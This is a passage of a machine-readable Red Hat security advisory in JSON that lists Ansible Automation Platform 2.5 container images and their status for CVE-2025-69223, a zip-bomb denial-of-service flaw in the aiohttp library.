"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-69223",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-06T20:01:19.831548+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2427456"
}
],
"notes": [
{
"category": "description",
"text": "A decompression based denial of service flaw has been discovered in the AIOHTTP python library. Library versions 3.13.2 and below allow a zip bomb to be used to execute a DoS against the AIOHTTP server. An attacker may be able to send a compressed request that when decompressed by AIOHTTP could exhaust the host\u0027s memory.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP\u0027s HTTP Parser auto_decompress feature is vulnerable to zip bomb",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64"
],
"known_not_affected": [
